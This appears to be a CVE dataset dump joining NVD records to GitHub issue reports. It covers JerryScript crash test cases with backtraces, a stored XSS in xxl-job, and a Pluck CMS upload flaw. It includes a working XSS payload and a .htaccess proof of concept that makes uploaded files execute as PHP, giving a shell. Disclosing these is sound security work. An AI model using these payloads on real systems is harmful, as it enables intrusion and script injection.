2021-06-16T09:03:07Z
https://github.com/jerryscript-project/jerryscript/issues/3976
651,142,365
3,976
CVE-2020-24345
2020-08-13T19:15:13.807
JerryScript through 2.3.0 allows stack consumption via function a(){new new Proxy(a,{})}JSON.parse("[]",a). NOTE: the vendor states that the problem is the lack of the --stack-limit option
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3977" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "01F91CD4-9EFF-4338-A18E-64F109090995", "versionEndExcluding": null, "versionEndIncluding": "2.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3977
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
### JerryScript revision git hash: 392ee717128f6daaf0b94e54fc9512eb26d680e2 ### Test case ```javascript function a() { new new Proxy(a, {}) } JSON.parse("[]", a) ``` ### Execution steps ./jerry poc.js ### Build cmd python tools/build.py --compile-flag="-fsanitize=address" Stack dump: --- ``` ASAN:DEADLYSIGNAL ================================================================= ==180140==ERROR: AddressSanitizer: stack-overflow on address 0x7fff1ed99fe8 (pc 0x5632f4db5751 bp 0x7fff1ed9a000 sp 0x7fff1ed99fe0 T0) #0 0x5632f4db5750 in ecma_is_lexical_environment /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/base/ecma-helpers.c:174 #1 0x5632f4db5c78 in ecma_get_lex_env_type /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/base/ecma-helpers.c:274 #2 0x5632f4ca68fa in ecma_op_resolve_reference_value /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-reference.c:276 #3 0x5632f4d219de in vm_loop.lto_priv.485 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:1036 #4 0x5632f4cf8723 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4670 #5 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #6 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #7 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #8 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #9 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #10 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #11 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #12 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #13 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #14 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #15 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #16 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #17 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #18 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #19 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #20 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #21 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #22 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #23 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #24 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #25 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #26 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #27 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #28 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #29 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #30 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #31 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #32 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #33 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 ``` ---
Stack overflow in ecma_is_lexical_environment
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3977/comments
1
2020-07-06T05:01:36Z
2020-07-06T13:02:51Z
https://github.com/jerryscript-project/jerryscript/issues/3977
651,247,064
3,977
CVE-2020-23814
2020-09-03T17:15:11.097
Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/1866" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.ccsq8.com/issues.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7AE69F1-6781-47B8-933D-989F4EF5ED19", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/xuxueli/xxl-job/issues/1866
[ "Exploit", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
Locate the executor management function: https://github.com/xuxueli/xxl-job/blob/289f02185b952f4652a4a7daf4ac3c6384f338bc/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobGroupController.java insert POC there has front-end validation,By code audit, I find that the back end only has length validation.Can be bypassed by Burp Intercept. POC:<img/src=# onerror="alert(1)"/> ![image](https://user-images.githubusercontent.com/11627654/88906630-3e412d00-d28a-11ea-8240-a1c4b679a453.png) The code directly gets AppName and manually entered parameters for front-end display.No filtering or encoding .Causes storage XSS vulnerabilities. ![image](https://user-images.githubusercontent.com/11627654/88906662-47ca9500-d28a-11ea-87a9-4fa0f9dd46a5.png) The page automatically loads and triggers XSS every 60 seconds. ![image](https://user-images.githubusercontent.com/11627654/88906721-5b75fb80-d28a-11ea-81ce-485883386edd.png) ![image](https://user-images.githubusercontent.com/11627654/88906736-5f098280-d28a-11ea-975a-3076f861f116.png)
v2.2.0 Stored XSS vulnerabilities
https://api.github.com/repos/xuxueli/xxl-job/issues/1866/comments
5
2020-07-30T09:30:54Z
2021-02-16T15:18:29Z
https://github.com/xuxueli/xxl-job/issues/1866
668,541,948
1,866
CVE-2020-13991
2020-09-24T23:15:13.540
vm/opcodes.c in JerryScript 2.2.0 allows attackers to hijack the flow of control by controlling a register.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/googleprojectzero/fuzzilli#JerryScript" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3858" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3859" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3860" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/pull/3867" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3858
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision c09c2c5dd7144d97b8b32cc2697d5b04bb647e35 ###### Build platform Ubuntu 18.04 LTS ###### Build steps python tools/build.py --profile=es2015-subset --lto=off --error-messages=on --strip=off --compile-flag=-fsanitize=address ###### Test case ``` function main() { const v1 = ~2147483649; const v3 = v1 / v1; const v4 = v3 % "species"; function v5(v6,v7,v8,v9) { const v11 = [1337,1337]; return v5; } const v14 = "species".__proto__; "species"[4294967297] = v14; let v17 = 0; while (v17 < 3) { const v18 = gc(...v4,3,v4); } const v19 = "species"[4179111969]; const v20 = v17 == v4; let v21 = 3; if (v19) { const v23 = {set:v19}; const v25 = Object.defineProperty("species","constructor",v23); } else { v21 = 3; } const v26 = [13.37,13.37]; const v27 = {toString:0,length:v3,d:0}; const v28 = v17 - v27; const v29 = v19.__proto__; const v30 = v19(v4,3,2147483649,v29); const v31 = [v21,v29,2147483649,v21]; const v33 = [1337,1337]; const v34 = v29 - 1; const v35 = [2147483649,13.37,"species"]; const v36 = {a:13.37,length:13.37}; const v37 = {constructor:v35}; let v38 = v33; let v41 = 0; while (v41 < 1) { } let v42 = gc; v35.__proto__ = v33; const v44 = Symbol.iterator; const v45 = Symbol[v44]; const v47 = RegExp(v45); } main(); ``` ###### Execution steps build/bin/jerry testcase.js ###### Output AddressSanitizer:DEADLYSIGNAL ###### Backtrace Program received signal SIGSEGV, Segmentation fault. 0x00000000004ffd0c in ecma_deref_ecma_string () (gdb) bt ``` #0 0x00000000004ffd0c in ecma_deref_ecma_string () #1 0x00000000005a95bb in opfunc_spread_arguments () #2 0x0000000000560348 in vm_loop () #3 0x000000000055b5f6 in vm_execute () #4 0x000000000055b193 in vm_run () #5 0x000000000051f650 in ecma_op_function_call_simple () #6 0x000000000051f2d6 in ecma_op_function_call () #7 0x000000000055b9aa in vm_execute () #8 0x000000000055b193 in vm_run () #9 0x00000000004f501e in jerry_run () #10 0x00000000004f25df in main (). ```
SEGV in ecma_deref_ecma_string
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3858/comments
0
2020-06-05T03:38:44Z
2020-06-06T16:39:42Z
https://github.com/jerryscript-project/jerryscript/issues/3858
631,287,137
3,858
CVE-2020-13991
2020-09-24T23:15:13.540
vm/opcodes.c in JerryScript 2.2.0 allows attackers to hijack the flow of control by controlling a register.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/googleprojectzero/fuzzilli#JerryScript" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3858" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3859" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3860" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/pull/3867" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3859
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision c09c2c5dd7144d97b8b32cc2697d5b04bb647e35 ###### Build platform Ubuntu 18.04 LTS ###### Build steps python tools/build.py --profile=es2015-subset --lto=off --error-messages=on --strip=off --compile-flag=-fsanitize=address ###### Test case ``` function main() { const v3 = {a:13.37,length:13.37}; const v6 = [13.37,13.37]; let v9 = 0; const v10 = v6.copyWithin(v9,8,2147483649); const v11 = -9007199254740993 == gc; const v12 = gc(...v11,...v3); } main(); ``` ###### Execution steps build/bin/jerry testcase.js ###### Output AddressSanitizer:DEADLYSIGNAL ###### Backtrace Program received signal SIGSEGV, Segmentation fault. 0x000000000053bd5f in jmem_pools_finalize () (gdb) bt ``` #0 0x000000000053bd5f in jmem_pools_finalize () #1 0x000000000053a7bb in jmem_finalize () #2 0x00000000004f2ba0 in main () ```
SEGV in jmem_pools_finalize
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3859/comments
0
2020-06-05T03:41:34Z
2020-06-06T16:39:42Z
https://github.com/jerryscript-project/jerryscript/issues/3859
631,287,983
3,859
CVE-2020-13991
2020-09-24T23:15:13.540
vm/opcodes.c in JerryScript 2.2.0 allows attackers to hijack the flow of control by controlling a register.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/googleprojectzero/fuzzilli#JerryScript" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3858" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3859" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3860" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/pull/3867" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3860
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision c09c2c5dd7144d97b8b32cc2697d5b04bb647e35 ###### Build platform Ubuntu 18.04 LTS ###### Build steps python tools/build.py --profile=es2015-subset --lto=off --error-messages=on --strip=off --compile-flag=-fsanitize=address ###### Test case ``` function main() { const v4 = [13.37,13.37]; const v6 = [1337,1337]; const v7 = [2147483649,13.37,"species"]; const v8 = {a:13.37,length:13.37}; const v9 = {constructor:v7}; let v10 = v6; const v12 = {}; const v13 = [v12,v12,v12,v12]; const v14 = gc(); const v15 = "species".__proto__; let v18 = 0; while (v18 < 4) { const v19 = v18 + 1; v18 = v19; } const v22 = gc(); const v23 = "species".length; const v24 = [13.37,13.37]; const v26 = [1337,1337]; const v27 = [2147483649,13.37,"species"]; const v28 = {a:13.37,length:13.37}; const v29 = {constructor:v27}; const v33 = [13.37,13.37]; const v36 = {get:gc,set:gc}; const v38 = Object.defineProperty(v9,"e",v36); const v39 = !v8; const v40 = [0,v33,"species"]; const v45 = [2147483649,13.37,"species"]; const v46 = {constructor:v45}; const v48 = [1337,1337]; const v51 = Object(); let v52 = 0; const v53 = Object(); const v54 = v52 + 1; const v55 = [1337,1337]; const v56 = [2147483649,1337,"species"]; const v57 = {a:13.37,length:13.37}; const v58 = {constructor:v56}; const v61 = [1337,1337]; let v62 = v61; const v66 = [1337,1337]; const v67 = [2147483649,"species","species"]; const v69 = v66 % v66; const v70 = [1337,1337]; const v71 = !v46; let v74 = 0; do { let v75 = 13.37; try { const v76 = Object(...1,v38); } catch(v77) { const v78 = typeof v56; const v80 = v78 === "number"; let v81 = v80; } } while (v74 < 9); } main(); ``` ###### Execution steps build/bin/jerry testcase.js ###### Output Program received signal SIGABRT, Aborted. ###### Backtrace Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 (gdb) bt ``` #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6e43801 in __GI_abort () at abort.c:79 #2 0x00000000005ac952 in jerry_port_fatal () #3 0x000000000053beef in jerry_fatal () #4 0x00000000004f90d3 in ecma_ref_object () #5 0x00000000005042cd in ecma_copy_value () #6 0x000000000055cf7c in vm_loop () #7 0x000000000055b5f6 in vm_execute () #8 0x000000000055b193 in vm_run () #9 0x000000000051f650 in ecma_op_function_call_simple () #10 0x000000000051f2d6 in ecma_op_function_call () #11 0x000000000055b9aa in vm_execute () #12 0x000000000055b193 in vm_run () #13 0x00000000004f501e in jerry_run () #14 0x00000000004f25df in main () ```
SIGABRT in jerry_port_fatal
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3860/comments
3
2020-06-05T03:46:21Z
2020-06-06T16:39:41Z
https://github.com/jerryscript-project/jerryscript/issues/3860
631,289,340
3,860
CVE-2020-21564
2020-09-30T18:15:24.303
An issue was discovered in Pluck CMS 4.7.10-dev2 and 4.7.11. There is a file upload vulnerability that can cause a remote command execution via admin.php?action=files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/83" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/91" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:dev2:*:*:*:*:*:*", "matchCriteriaId": "960CA1A9-1510-488A-82C2-14AFA3AF7FBE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.11:*:*:*:*:*:*:*", "matchCriteriaId": "B5BD7966-27D7-48D5-8B6B-5A9A8BAB508A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/pluck-cms/pluck/issues/83
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
Vulnerability location: /data/inc/file.php line:42 ![image](https://user-images.githubusercontent.com/55877767/67195146-04a1e280-f42b-11e9-9b70-023bde63d1a7.png) If the file name is '.htaccess', the strpos function returns a result of 0. Demo: Upload these two files in the management file interface. ![image](https://user-images.githubusercontent.com/55877767/67190788-32832900-f423-11e9-838d-847fd6c15d8f.png) ![image](https://user-images.githubusercontent.com/55877767/67195721-0ae48e80-f42c-11e9-9dcc-a0100205d417.png) Access in /files/1.txt. ![image](https://user-images.githubusercontent.com/55877767/67190921-62323100-f423-11e9-8507-78ce8cbf8f40.png) Successful execution. Then upload attack code. ![image](https://user-images.githubusercontent.com/55877767/67191254-e71d4a80-f423-11e9-8de6-bb721a3e6f1d.png) ![image](https://user-images.githubusercontent.com/55877767/67191968-36b04600-f425-11e9-96de-df355c8edc79.png) Successfully obtained the shell. Poc: ``` .htaccess <FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch> ```
Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability in the management file interface.
https://api.github.com/repos/pluck-cms/pluck/issues/83/comments
5
2019-10-21T09:08:10Z
2020-05-01T07:25:08Z
https://github.com/pluck-cms/pluck/issues/83
509,831,136
83
CVE-2020-21564
2020-09-30T18:15:24.303
An issue was discovered in Pluck CMS 4.7.10-dev2 and 4.7.11. There is a file upload vulnerability that can cause a remote command execution via admin.php?action=files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/83" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/91" } ]
